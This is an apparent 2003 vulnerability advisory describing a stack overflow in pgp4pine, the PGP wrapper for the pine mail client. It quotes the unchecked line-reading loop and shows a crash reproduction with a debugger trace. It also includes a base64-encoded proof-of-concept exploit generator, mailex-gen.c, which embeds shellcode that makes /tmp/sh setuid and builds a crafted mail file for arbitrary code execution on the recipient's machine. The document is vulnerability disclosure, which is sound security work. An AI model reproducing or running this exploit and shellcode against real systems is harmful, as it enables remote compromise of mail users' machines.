12th Mar 2003 [SBWID-6060]
COMMAND
pgp4pine stack overflow vulnerability
SYSTEMS AFFECTED
current ?
PROBLEM
Eric Auge [[email protected]] found :
I Background:
pgp4pine is a mail encryption/decryption/signature/verification wrapper
to gpg for pine, it is called from pine to parse mail body and get PGP
information from the file.
more information : http://pgp4pine.flatline.de/
II Problem description:
When installed/configured within pine, pgp4pine parse any incoming mail
before reading (in the default standard configuration) looking for PGP
tokens & informations to do his sender's signature verifications.
To verify incoming mail it calls :
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
and read each line according to this loop :
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
fertig=0;
while (!fertig)
{
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
else if ((readline[i++]=c) == '\n')
{
readline[i]='\0';
fertig=1;
}
}
fertig=0;
if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
{
/* got signed message */
fclose(fin);
while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
fertig=1;
}
else if (strncmp("-----BEGIN PGP",readline,14)==0)
{
/* got another type of PGP message (encrypted, keys ...) */
fclose(fin);
fileDecrypt(inFile,outFile);
waitForReturn();
fertig=1;
}
else
i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
If a single line go over 256 chars directly to EOF, it will overwrite
saved environnement on the stack and return, since there is no check on
the index 'i' within the readline[] array,
[...]
}
else if ((readline[i++]=c) == '\n')
{
[...]
you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary saved
registers before hiting one condition to return.
[...]
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
[...]
then try:
rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Here it is ;)
--0-784433148-1047484280=:99514
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="mailex-gen.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description: mailex-gen.c
Content-Disposition: ATTACHMENT; FILENAME="mailex-gen.c"
DQovKiANCiAqICBtYWlsZXgtZ2VuLmMgLS0gUEdQNFBpbmUgZXhwbG9pdCBt
YWlsIGdlbmVyYXRvciAtIHByb29mIG9mIGNvbmNlcHQgDQogKiAgQ29weXJp
Z2h0IChDKSAyMDAzIC0gRXJpYyBBVUdFDQogKiAgDQogKiAgIFRoaXMgcHJv
Z3JhbSBpcyBmcmVlIHNvZnR3YXJlOyB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBp
dCBhbmQvb3INCiAqICAgbW9kaWZ5IGl0IHVuZGVyIHRoZSB0ZXJtcyBvZiB0
aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UNCiAqICAgYXMgcHVibGlz
aGVkIGJ5IHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2
ZXJzaW9uIDIgb2YNCiAqICAgdGhlIExpY2Vuc2Ugb3IgKGF0IHlvdXIgb3B0
aW9uKSBhbnkgbGF0ZXIgdmVyc2lvbi4NCiAqDQogKiAgIFRoaXMgcHJvZ3Jh
bSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUN
CiAqICAgdXNlZnVsLCBidXQgV0lUSE9VVCBBTlkgV0FSUkFOVFk7IHdpdGhv
dXQgZXZlbiB0aGUgaW1wbGllZA0KICogICB3YXJyYW50eQ0KICogICBvZiBN
RVJDSEFOVEFCSUxJVFkgb3IgRklUTkVTUyBGT1IgQSBQQVJUSUNVTEFSIFBV
UlBPU0UuICBTZWUgdGhlDQogKiAgIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNl
bnNlIGZvciBtb3JlIGRldGFpbHMuDQogKg0KICogICBZb3Ugc2hvdWxkIGhh
dmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMN
CiAqICAgTGljZW5zZQ0KICogICBhbG9uZyB3aXRoIHRoaXMgcHJvZ3JhbTsg
aWYgbm90LCB3cml0ZSB0byB0aGUgRnJlZSBTb2Z0d2FyZQ0KICogICBGb3Vu
ZGF0aW9uLCBJbmMuLCA1OSBUZW1wbGUgUGxhY2UsIFN1aXRlIDMzMCwgQm9z
dG9uLCBNQQ0KICogICAwMjExMS0xMzA3DQogKiAgIFVTQQ0KICoNCiAqIGhv
dyBwb2MgY29kZSB3b3JrcyA6IA0KICogICAkIGNwIC9iaW4vc2ggL3RtcC9z
aA0KICogICAkIGxzIC1sIC90bXAvc2gNCiAqICAgLXJ3eHIteC0tLSAgICAx
IHJpdmFsICAgIHVzZXJzICAgICAgNjgwMzA0IE1hciAxMiAxNToxNyAvdG1w
L3NoDQogKiAgICQgLi9tYWlsZXgtZ2VuDQogKiAgIGVpcCAoaSB1c2UgcmVh
ZGxpbmVbXSBhZGRyKTogMHhiZmZmZGJkMA0KICogICBub3cgdHlwZTogL3Bh
dGgvdG8vcGdwNHBpbmUtdnVsbiAtZCAtaSAuL21haWxtZQ0KICogICAkIC9w
YXRoL3RvL3BncDRwaW5lLXZ1bG4gLWQgLWkgLi9tYWlsbWUNCiAqICAgJCBs
cyAtbCAvdG1wL3NoDQogKiAgIC1yd3NyLXhyLXggICAgMSByaXZhbCAgICB1
c2VycyAgICAgIDY4MDMwNCBNYXIgMTIgMTU6MTcgL3RtcC9zaA0KICoNCiAq
DQogKiAgIEVyaWMgQVVHRSA8ZWF1Z2VAZnIuY3cubmV0Pg0KICoNCiAqLw0K
DQovKiANCiAqIE5PVEU6IEVJUCBpcyBoYXJkY29kZWQgcmVnYXJkaW5nIG15
IG93biBzeXN0ZW0gYW5kIHRlc3RzLA0KICogICAgICAgdHVuZSBpdCBmb3Ig
eW91ciBuZWVkcyA7KQ0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2lu
Y2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1
ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1
ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8ZmNudGwuaD4NCg0KI2RlZmlu
ZSBNQVhMSU5FU0laRSAzMDENCiNkZWZpbmUgU0FWRURfRUlQIDB4YmZmZmRi
ZDANCiNkZWZpbmUgTk9QIDB4OTANCiNkZWZpbmUgQUxJR04gMA0KI2RlZmlu
ZSBYRklMRSAibWFpbG1lIg0KDQovKiBxdWljayBtYWRlIGNob3duIDQ3NTUg
L3RtcC9zaCAqLw0KdW5zaWduZWQgY2hhciBzaGVsbGNvZGVbXSA9IA0KIlx4
ZWJceDE0XHgzMVx4YzBceDM0XHgwZlx4NWJceDMxXHhjOVx4NjZceGI5XHhl
ZFx4MDlceGNkXHg4MCINCiJceDMxXHhjMFx4NDBceDg5XHhjM1x4Y2RceDgw
XHhlOFx4ZTdceGZmXHhmZlx4ZmYvdG1wL3NoIjsNCg0KaW50IG1haW4oaW50
IGFyZ2MsIGNoYXIgKiphcmd2KSB7DQoNCiAgICBpbnQgaSxfc2Nfc2l6ZSxm
ZDsNCiAgICB1bnNpZ25lZCBjaGFyIGJ1ZmZlcltNQVhMSU5FU0laRV0gPSAi
XDAiOw0KICAgIGxvbmcgKnB0cjsNCiAgICBjaGFyICpjcHRyOw0KDQogICAg
X3NjX3NpemUgPSBzaXplb2Yoc2hlbGxjb2RlKTsNCg0KICAgIHB0ciA9IChs
b25nICopICZidWZmZXI7DQogICAgZnByaW50ZihzdGRlcnIsImVpcCAoaSB1
c2UgcmVhZGxpbmVbXSBhZGRyKTogJXBcbiIsIFNBVkVEX0VJUCk7DQogICAg
Zm9yIChpID0gMDsgaSA8IE1BWExJTkVTSVpFIDsgaSArPSA0KSB7DQoJKnB0
cisrID0gU0FWRURfRUlQOw0KICAgIH0NCg0KICAgIGNwdHIgPSAoY2hhciAq
KSAmYnVmZmVyOw0KICAgIGNwdHIgPSBjcHRyICsgTUFYTElORVNJWkUgLSA0
NSAtIF9zY19zaXplOw0KDQogICAgZm9yICggaSA9IDA7IGkgPCBfc2Nfc2l6
ZSA7IGkrKyApDQoJKmNwdHIrKyA9IHNoZWxsY29kZVtpXTsNCg0KICAgIGZv
ciAoIGNwdHIgPSAoY2hhciAqKSAmYnVmZmVyIDsgY3B0ciA8ICgoY2hhciAq
KWJ1ZmZlciArIE1BWExJTkVTSVpFIC0gNDUgLSBfc2Nfc2l6ZSkgOyBjcHRy
KyspDQoJKmNwdHIgPSBOT1A7DQoNCiAgICAvKiBub3cgbGV0cyBjcmVhdGUg
dGhlIGZpbGUgKi8NCiAgICBpZiAoIChmZCA9IG9wZW4oWEZJTEUsIE9fQ1JF
QVR8T19XUk9OTFl8T19UUlVOQywgU19JUldYVXxTX0lSR1JQfFNfSVJPVEgp
KSA9PSAtMSkgew0KCWZwcmludGYgKHN0ZGVyciwib3BlbigpIGZhaWxlZCFc
biIpOw0KCWV4aXQoMSk7DQogICAgfQ0KICAgIHdyaXRlKGZkLCZidWZmZXIs
c2l6ZW9mKGJ1ZmZlcikpOw0KICAgIGNsb3NlKGZkKTsNCiAgICBmcHJpbnRm
KHN0ZGVyciwibm93IHR5cGU6IC9wYXRoL3RvL3BncDRwaW5lLXZ1bG4gLWQg
LWkgLi9tYWlsbWVcbiIpOw0KCQ0KICAgIHJldHVybiAoMCk7DQp9DQo=
--0-784433148-1047484280=:99514--
III Impact
Since pgp4pine process any incoming email, sending special crafted
email can make sender execute arbitrary code on the recipient box when
the mail is opened.
SOLUTION
?